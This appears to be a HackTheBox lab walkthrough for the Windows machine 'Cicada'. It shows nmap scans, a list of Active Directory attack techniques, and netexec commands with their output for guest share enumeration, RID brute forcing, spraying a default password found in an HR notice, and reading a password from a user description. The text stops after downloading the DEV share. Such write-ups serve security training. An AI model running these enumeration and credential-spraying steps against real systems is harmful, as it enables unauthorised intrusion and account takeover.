walkthrough

HackTheBox: Cicada — Easy (Windows)

Full security assessment walkthrough for Cicada on HackTheBox. Includes reconnaissance, enumeration, exploitation steps, and a professional penetration testing report with CVSS v3.1 scores and remediation guidance.

lazyhackers
Mar 26, 2026 · 1 min read · 1 views
Cicada
HackTheBox
Windows Easy

🔖 Techniques & Vulnerabilities

SMBMisconfigurationDefaultPasswordUserDescriptionsSeBackupPrivilegePasstheHashPtHrcepass-the-hashsudobloodhoundidor

🔍 Reconnaissance / Port Scanning

nmap scan
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV 10.129.180.249
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 13:36 CEST
Nmap scan report for 10.129.180.249
Host is up (0.014s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 18:36:15Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-09-29T18:36:56
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.68 seconds

🎯 Attack Surface Analysis

PortServiceVersion / Banner
53/tcpdomainSimple DNS Plus
88/tcpkerberos-secMicrosoft Windows Kerberos (server time: 2024-09-29 18:36:15Z)
123/udpntpNTP v3
135/tcpmsrpcMicrosoft Windows RPC
139/tcpnetbios-ssnMicrosoft Windows netbios-ssn
389/tcpldapMicrosoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
445/tcpmicrosoft-ds?464/tcp open kpasswd5?
593/tcpncacn_httpMicrosoft Windows RPC over HTTP 1.0
636/tcpssl/ldapMicrosoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3268/tcpldapMicrosoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3269/tcpssl/ldapMicrosoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
5985/tcphttpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP)
62484/tcpmsrpcMicrosoft Windows RPC
53/tcpDNS
  • Zone transfer (AXFR) reveals all DNS records if permitted
  • Subdomain brute-force to discover hidden services and admin panels
  • Reverse lookup enumeration to map IP ranges to hostnames
  • DNS cache poisoning on vulnerable resolvers
88/tcpKerberos
  • AS-REP Roasting — pre-auth disabled accounts yield tickets for offline cracking
  • Kerberoasting — SPN accounts yield TGS tickets for offline cracking
  • Golden Ticket — KRBTGT hash enables forging unrestricted domain access tickets
  • Silver Ticket — service account hash enables forging service-specific tickets
  • Pass-the-Ticket — inject valid tickets from memory to authenticate as another user
  • Kerberos delegation abuse — unconstrained or misconfigured constrained delegation
123/tcpntp
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques
135/tcpMSRPC
  • RPC endpoint enumeration maps registered services and interfaces
  • DCOM lateral movement via Component Object Model
  • WMI remote execution with valid credentials
  • PrintSpooler (MS-RPRN) abuse coerces NTLM authentication
139/tcpNetBIOS-SMB
  • Null session enumeration of users, shares, and domain info
  • SMBv1 exploitation — EternalBlue (MS17-010) on unpatched systems
  • NTLM relay — captured auth relayed to other services
  • Credential brute-force against SMB authentication
389/tcpLDAP
  • Anonymous bind — unauthenticated enumeration of all AD objects
  • Password policy retrieval for informed brute-force strategy
  • BloodHound collection for AD attack path analysis
  • LDAP injection in web applications building directory queries from user input
445/tcpSMB
  • Share enumeration — scripts, configs, credentials in accessible shares
  • EternalBlue (MS17-010) — unauthenticated RCE on unpatched SMBv1 systems
  • NTLM relay attack — authentication coercion for lateral movement
  • Pass-the-Hash — NTLM hash authenticates without plaintext password
  • Credential brute-force and password spraying
593/tcpncacn_http
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques
636/tcpLDAPS
  • All LDAP attack vectors over encrypted channel
  • Client certificate authentication testing
3268/tcpldap
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques
3269/tcpssl/ldap
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques
5985/tcpWinRM
  • Valid credentials grant PowerShell remoting (Evil-WinRM)
  • Pass-the-Hash — NTLM hash authenticates without cleartext password
  • Token impersonation from elevated WinRM sessions
62484/tcpmsrpc
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques

📖 Walkthrough

Reconnaissance

Port Scanning

We performed the typical port scans to not miss-out on anything but the ports were pretty standard for a Windows box.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV 10.129.180.249
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 13:36 CEST
Nmap scan report for 10.129.180.249
Host is up (0.014s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 18:36:15Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-09-29T18:36:56
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.68 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.129.180.249
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 13:37 CEST
Nmap scan report for 10.129.180.249
Host is up (0.013s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 18:40:20Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
62484/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-09-29T18:41:11
|_  start_date: N/A
|_clock-skew: 7h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 237.20 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sU 10.129.180.249
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 13:46 CEST
Nmap scan report for 10.129.180.249
Host is up (0.020s latency).
Not shown: 997 open|filtered udp ports (no-response)
PORT    STATE SERVICE      VERSION
53/udp  open  domain       Simple DNS Plus
88/udp  open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-29 18:46:09Z)
123/udp open  ntp          NTP v3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5079.49 seconds

We added cicada.htb and CICADA-DC.cicada.htb to our /etc/hosts file.

┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
10.129.180.249  cicada.htb
10.129.180.249  CICADA-DC.cicada.htb

Enumeration of Port 445/TCP

Since there was no website given we started by enumerating port 445/TCP. Luckily enough it was possible to read IPC$ without authentication.

┌──(kali㉿kali)-[~]
└─$ netexec smb 10.129.180.249 -u '' -p '' --shares 
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\: 
SMB         10.129.180.249  445    CICADA-DC        [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~]
└─$ netexec smb 10.129.180.249 -u ' ' -p ' ' --shares
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\ :  
SMB         10.129.180.249  445    CICADA-DC        [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~]
└─$ netexec smb 10.129.180.249 -u 'guest' -p '' --shares   
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.129.180.249  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.180.249  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.180.249  445    CICADA-DC        -----           -----------     ------
SMB         10.129.180.249  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.180.249  445    CICADA-DC        C$                              Default share
SMB         10.129.180.249  445    CICADA-DC        DEV                             
SMB         10.129.180.249  445    CICADA-DC        HR              READ            
SMB         10.129.180.249  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.180.249  445    CICADA-DC        NETLOGON                        Logon server share 
SMB         10.129.180.249  445    CICADA-DC        SYSVOL                          Logon server share

RID Brute Forcing

So we performed RID Brute Forcing to get a set of usernames out of it.

┌──(kali㉿kali)-[~]
└─$ netexec smb 10.129.180.249 -u 'guest' -p '' --rid-brute
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.129.180.249  445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.129.180.249  445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.180.249  445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.180.249  445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.180.249  445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.129.180.249  445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)
Username
support
administrator
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

Investigating HR Share

Next-up we took a look at the HR share which we could also read.

┌──(kali㉿kali)-[~]
└─$ netexec smb 10.129.180.249 -u 'guest' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\guest: 
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]     STATS_FLAG: True
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.129.180.249  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.180.249  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.180.249  445    CICADA-DC        -----           -----------     ------
SMB         10.129.180.249  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.180.249  445    CICADA-DC        C$                              Default share
SMB         10.129.180.249  445    CICADA-DC        DEV                             
SMB         10.129.180.249  445    CICADA-DC        HR              READ            
SMB         10.129.180.249  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.180.249  445    CICADA-DC        NETLOGON                        Logon server share 
SMB         10.129.180.249  445    CICADA-DC        SYSVOL                          Logon server share 
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.129.180.249.json".
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] SMB Shares:           7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] SMB Readable Shares:  2 (HR, IPC$)
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] Total folders found:  0
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] Total files found:    1
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] File size average:    1.24 KB
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] File size min:        1.24 KB
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] File size max:        1.24 KB
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] File unique exts:     1 (.txt)
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] Downloads successful: 1
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [+] All files processed successfully.

And we found a Notice from HR.txt file inside the share which contained a default password for new hires.

┌──(kali㉿kali)-[/media/…/HTB/Machines/Cicada/files]
└─$ cat Notice\ from\ HR.txt 

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp
Password
Cicada$M6Corpb*@Lp#nZp!8

Getting Password for michael.wrightson

We sprayed the newly found password together with the previously extracted list of usernames against the box and got a hit for valid credentials on michael.wrightson.

┌──(kali㉿kali)-[/media/…/HTB/Machines/Cicada/files]
└─$ netexec smb 10.129.180.249 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'               
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
UsernamePassword
michael.wrightsonCicada$M6Corpb*@Lp#nZp!8

Getting the Password for david.orelious

As next step we used the credentials to read the user descriptions and found another password. This time it was for the user david.orelious.

┌──(kali㉿kali)-[/media/…/HTB/Machines/Cicada/files]
└─$ netexec ldap 10.129.180.249 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M get-desc-users
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
  xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.129.180.249  389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
GET-DESC... 10.129.180.249  389    CICADA-DC        [+] Found following users: 
GET-DESC... 10.129.180.249  389    CICADA-DC        User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... 10.129.180.249  389    CICADA-DC        User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.129.180.249  389    CICADA-DC        User: krbtgt description: Key Distribution Center Service Account
GET-DESC... 10.129.180.249  389    CICADA-DC        User: david.orelious description: Just in case I forget my password is aRt$Lp#7t*VQ!3
UsernamePassword
david.oreliousaRt$Lp#7t*VQ!3
┌──(kali㉿kali)-[/media/…/HTB/Machines/Cicada/files]
└─$ netexec smb 10.129.180.249 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3'
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3

Investigating DEV Share

The newly found credentials of david.orelious made us capable of reading the content of the DEV share.

┌──(kali㉿kali)-[/media/…/HTB/Machines/Cicada/files]
└─$ netexec smb 10.129.180.249 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.129.180.249  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.180.249  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.180.249  445    CICADA-DC        -----           -----------     ------
SMB         10.129.180.249  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.180.249  445    CICADA-DC        C$                              Default share
SMB         10.129.180.249  445    CICADA-DC        DEV             READ            
SMB         10.129.180.249  445    CICADA-DC        HR              READ            
SMB         10.129.180.249  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.180.249  445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.129.180.249  445    CICADA-DC        SYSVOL          READ            Logon server share

For convenience we downloaded all of it's content using NetExec.

┌──(kali㉿kali)-[/media/…/HTB/Machines/Cicada/files]
└─$ netexec smb 10.129.180.249 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares -M spider_plus -o DOWNLOAD_FLAG=true
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]     STATS_FLAG: True
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.129.180.249  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.180.249  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.180.249  445    CICADA-DC        -----           -----------     ------
SMB         10.129.180.249  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.180.249  445    CICADA-DC        C$                              Default share
SMB         10.129.180.249  445    CICADA-DC        DEV             READ            
SMB         10.129.180.249  445    CICADA-DC        HR              READ            
SMB         10.129.180.249  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.180.249  445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.129.180.249  445    CICADA-DC        SYSVOL          READ            Logon server share 
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.129.180.249.json".
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] SMB Shares:           7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] SMB Readable Shares:  5 (DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] Total folders found:  33
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] Total files found:    12
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] File size average:    1.09 KB
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] File size min:        23 B
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] File size max:        5.22 KB
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] File unique exts:     6 (.ps1, .txt, .pol, .ini, .cmtx, .inf)
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] Downloads successful: 12
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [+] All files processed successfully.

